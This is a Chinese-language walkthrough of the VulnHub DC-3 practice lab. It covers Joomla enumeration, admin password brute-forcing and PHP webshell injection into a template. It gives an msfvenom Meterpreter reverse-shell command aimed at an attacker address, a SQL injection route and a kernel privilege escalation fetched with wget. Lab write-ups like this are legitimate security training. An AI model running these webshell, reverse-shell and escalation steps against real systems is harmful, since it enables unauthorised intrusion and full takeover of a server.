vulnhub-DC3靶场复盘
端口扫描
nmap扫描这个端口之后 可以得到一些更重要的信息 比如这个网站用的cms是joomla
用searchsploit可以发现有非常多的漏洞 百度之后发现有一个扫描器 joomscan
web探测
web界面只有一个登录界面 可以尝试直接爆破 但是从结果来说 确实可以爆破 而且账户也存在
但是这里不是实际的管理界面
用joomscan可以找到真实的管理员登录界面 我们用password.lst 爆破可以得到密码
这个管理界面没有可以注入的点
在模板中 可以看到php文件 我们可以在index.php中直接插入php代码 比如phpinfo() 到网站首页之后发现成功了
(这里如果要在index中插入必须要是用的和网站现在用的模板一样才可以 如果在html文件夹里面插入就不用管
然后上传php一句话木马 用蚁剑连接 拿到webshell
但是这里没有nc指令 我们要用到msfconsole
先输入msfconsole进入命令面板 use payload/php/meterpreter/reverse_tcp
然后需要用msfvenom生成攻击文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.240.11 lport=1234 > a.php
接着回到msfconsole 用 use exploit/multi/handler 这是一个监听器 然后设置payload set payload php/meterpreter/reverse_tcp
show options 查看需要配置什么
set lhost 192.168.240.11 set lpost 1234 最后run就可以了
在web界面刷新刚才插入payload php代码的界面 就可以在msf中看到成功连接了
输入shell 进入
2用joomla漏洞 (非爆破)
用searchsploit 搜索joomla + 版本号
这个脚本告诉我们了sqlmap使用的sqlmap
到columns这里要注意一点 这里用自动就什么都没有 而且因为这个表名有# 有用引号括起来
同样可以得到这个密码
提权
可以做一些常规的操作比如suid 系统漏洞等 suid没有可以利用的 但是系统比较老 可以用内核提权
.linux系统漏洞提权
先在webshell里面用cat /etc/*releas 得到当前ubuntu系统的版本号 DISTRIB_RELEASE=16.04uname -a 查看内核版本 Linux DC-3 4.4.0-21-generic
然后用searchsploit 找到漏洞利用脚本(必须同时满足系统和内核版本) 这里给的网址已经失效 需要我们去仓库 找到新的地方
把下载下来的文件用scp复制到kali 的/var/www/html中 然后在webshell用wget下载这个利用脚本
解压之后 运行脚本就可以提权了